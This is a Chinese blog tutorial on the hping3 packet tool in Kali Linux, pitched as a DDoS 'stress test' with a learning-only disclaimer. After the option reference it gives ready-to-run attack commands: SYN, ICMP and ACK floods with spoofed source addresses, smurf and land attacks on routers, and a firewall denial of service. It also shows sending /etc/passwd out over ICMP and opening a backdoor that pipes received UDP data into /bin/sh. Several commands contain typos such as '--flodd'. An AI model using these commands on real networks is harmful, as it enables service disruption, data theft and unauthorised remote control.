ddos网络压力测试工具

ICMP,SYN,TCP/UDP 数据发包

警告:该工具会造成非法行为,严禁商用!!!

仅共学习,网络了解
hping3是一个命令行下使用的,数据包组装/发包,分析工具,它还可以支持TCP、UDP、ICMP,syn和RAW-IP协议,它有一个路由跟踪模式,能够在两个相互包含的通道之间传送文件。hpin3常被用于检测网络和主机,其功能非常强大,可在多种操作系统下运行
一款功能强大软件


开始安装

本次教程基于 kali 系统
因为kali软件源自带hping3工具
直接输入命令一键安装

apt-get install hping3

hping3.PNG

su - root
#切换到最高Root 环境变量用户

hping3 --help
#查看命令参考,出现则说明已安装成功

不想看参数,右边文章目录直接跳转到
常用命令格式


基本参数

-c --count
发送数据包数量
-i --interval
发送数据包间隔的时间 (uX即X微秒,例如:-i u1000)  
--fast
等同 -i u10000 (每秒10个包)  
-D --debug
开启调试模式
-q --quiet
静默模式,最后再输出结果
-I --interface 接口名称
选择特定的网卡口
-V --verbose
开启详细格式输出
--faster
等同 -i u1000 (每秒100个包)  
--flood
尽最快发送数据包,不显示回复
-n --numeric
数字化输出,象征性输出主机地址
-z --bind
绑定ctrl+z到ttl(默认为目的端口)
-Z --unbind
取消绑定ctrl+z键  
--beep
对于接收到的每个匹配数据包蜂鸣声提示

模式参数

-0 --rawip
RAWIP模式,原始IP模式。在此模式下HPING会发送带数据的IP头。即裸IP方式。使用RAWSOCKET方式
-1 --icmp
ICMP模式,此模式下HPING会发送IGMP应答报,可用--ICMPTYPE --ICMPCODE选项发送其他类型/模式的ICMP报文
-2 --udp
UDP 模式,缺省下,HPING会发送UDP报文到主机的0端口,可用--baseport --destport --keep选项指定其模式
-8 --scan
扫描模式 指定扫描对应的端口。 E.g. hping --scan 1-30,70-90 -S www.target.com
-9 --listen

IP参数

-a --spoof
源地址欺骗。伪造IP攻击,防火墙就不会记录真实IP,回应的包也接收不到
--rand-dest
随机目的地址模式。详细使用 man 命令  
--rand-source
随机源地址模式。详细使用 man 命令  
-t --ttl
修改 ttl 值 (默认 64) 
-N --id
hping 中的 ID 值,缺省为随机值  
-W --winid
使用window的字节序
-r --rel
更改ID,可以让ID呈递减输出
-f --frag
分片传输,可以测试对方碎片处理能力或绕过限制,缺省16字节
-x --morefrag
设置更多的分段标志,碎片攻击
-y --dontfrag
设置不分段标志。  
-g --fragoff
设置偏移量。  
-m --mtu
设置虚拟MTU值,当大于mtu的时候分段
-o --tos
tos字段,缺省0x00
-G --rroute
记录IP路由,并显示路由缓存
--lsrr
松散源路由并记录路由
--ssrr 
严格源路由并记录路
-H --ipproto
设置IP协议字段,仅在RAW IP模式下使用

ICMP参数

-C  --icmptype
icmp类型(默认echo请求)
-K  --icmpcode
icmp代号(默认0) 
--force-icmp
发送所有icmp类型(默认仅发送支持的类型) 强制ICMP类型
--icmp-gw
设置ICMP重定向网关地址(默认0.0.0.0)
--icmp-ts
等同 --icmp --icmptype 13 (ICMP 时间戳)
--icmp-addr
等同 --icmp --icmptype 17 (ICMP 地址子网掩码)
--icmp-help
显示icmp选项帮助
--icmp-ipver
设定IP头中的协议版本,默认是IPv4
--icmp-iphlen
设定IP头的长度
--icmp-iplen
设置IP头中的数据长度,默认为真是长度
--icmp-ipid
设置IP头中的id字段,默认随机
--icmp-ipproto
IP头中设置数据协议字段,默认是TCP
--icmp-cksum
设定ICMP校验和,默认是正确值

TCP/UDP参数

-s --baseport
缺省随机源端口  
-p --destport
缺省随机目的端口  
-k --keep
保持源端口  
-w --win
滑动窗口大小(默认64)  
-O --tcpoff
设置伪造tcp数据偏移量(取代tcp地址长度除4)  
-Q --seqnum
仅显示tcp序列号  
-b --badcksum
(尝试)发送具有错误IP校验和数据包
-M  --setseq
设置TCP序列号   
-L  --setack
设置TCP的ack序号
-F  --fin
FIN标志置一
-S  --syn
SYN标志置一
-R  --rst
RST标志置一
-P  --push
PUSH标志置一
-A  --ack
ACK标志置一
-U --urg
URG标志置一
-X --xmas
设定Xmas(0x40)标志位
-Y --ymas
设定Ymas(0x40)标志位
--tcpexitcode
使用last tcp-> th_flags作为退出码  
--tcp-mss
启用具有给定值的TCP MSS选项  
--tcp-timestamp
启用TCP时间戳选项来猜测HZ/uptime 

通用设置

d --data 数据大小
设定发送数据包大小,默认是0
-E --file
文件数据  
-e --sign
添加签名信息
-j --dump
转储为十六进制数据包
-J --print
转储为可打印字符
-B --safe
启用“安全”协议
-u --end
告诉你什么时候--file达到EOF并防倒回
-T --traceroute
traceroute模式(等同使用 --bind且--ttl 1)
--tr-stop
在traceroute模式下收到第一个不是ICMP时退出    
--tr-keep-ttl
保持源TTL固定,仅用于监视一跳
--tr-no-rtt 
不要在跟踪路由模式下计算/显示RTT信息 ARS包描述
--apd-send
发送APD描述数据包(参见docs /APD.txt)

常用命令格式

洪水疯狂发送包:--flodd
随机伪造IP:–rand-source
指定端口:-p 端口号
停止攻击:同时按住Ctrl+c键停止攻击

用如下打局域网下设备效果显著

hping3 -S -P -U --flood -V --rand-source 靶机IP

syn 洪水发包攻击
添加了flood参数,屏幕不会有提示
用手机成功让电脑断网
hping.JPG
ICMP洪水攻击

hping3 -1 -U --flood -V --rand-source 靶机IP

smurf 攻击 路由器

hping3 -1 -a --flodd -V 路由器IP 子网掩码/24
例子:
hping3 -1 -a --flodd -V 188.8.8.1 188.8.8.255

land 攻击 路由器

hping3 -S -a --flood -V 靶机IP 靶机IP

Land 攻击伪装成被攻击地址发送请求信息给被攻击地址本身

ack 攻击

hping3 -c 10000 -d 120 -A -w 64 -p 靶机端口 --flood --rand-source 靶机IP

以上5种命令攻击局域网效果显著

TCP 指定80端口攻击

hping3 靶机IP -p 80 -P --flood -V

UDP 指定445端口攻击

hping3 靶机IP -p 445 -S --flood -2 -V

发送指定数据包内容

echo "压力测试" >> test.txt
#创建一个包内容文件 test.txt

hping3 --flood -p 80 靶机IP -d 20 -E test.txt
#将指定数据包内容发送到靶机,默认TCP协议,目标端口80
-d 指定数据包大小
-E 指定发送的数据包内容

防火墙测试

hping3 --flood -S -c 1000000 -a 靶机IP -p 靶机端口 靶机IP

例:
hping3 --flood -S -c 1000000 -a 188.8.8.1 -p 80 188.8.8.1

指定各种数据包字段,依次对防火墙进行详细测试
测防火墙对ICMP包反应、是否支持traceroute、是否开放某端口、对防火墙进行拒绝服务攻击
发送源地址设置为与目标地址相同,诱使靶机与自己不停地建立连接
文件传输

hping3 靶机IP --listen signature --safe --icmp

借助TCP/UDP/ICMP包建立隐秘隧道通讯。实现开启监听端口,对检测到签名(签名为用户指定的字符串)的内容进行相应解析在靶机接收端开启服务

shping3 靶机IP --icmp -d 100 --sign signature --file /etc/passwdhell

监听ICMP包中的签名,根据签名解析出文件内容。
发送端使用签名打包的ICMP包发送文件
将/etc/passwd密码文件通过ICMP包传给靶机。发送包大小为100字节(-d 100),发送签名为signature(-sign signature)

端口监听,系统后门
先打开53 UDP端口DNS解析服务
监听来自靶机包含签名为signature的数据包,将收到的数据调用/bin/sh执行

hping3 靶机IP --listen signature --safe --udp -p 53 | /bin/sh
#在靶机端口启动

echo id > test.cmd
#生成一个包含id 命令 test.cmd文件

hping3 192.168.10.44 -p53 -d 100 --udp --sign siganature --file ./test.cmd
#在本地端控制 发送shell id命令

将包含id命令的文件加上签名signature发送到192.168.10.44主机的53号UDP端口,包数据长度为100字节。
建立连接后打开shell通信

端口扫描

hping3 靶机IP --scan 1-100 --flood -S --spoof 60

————————————————

最后修改:2021 年 07 月 28 日
如果觉得我的文章对你有用,请随意赞赏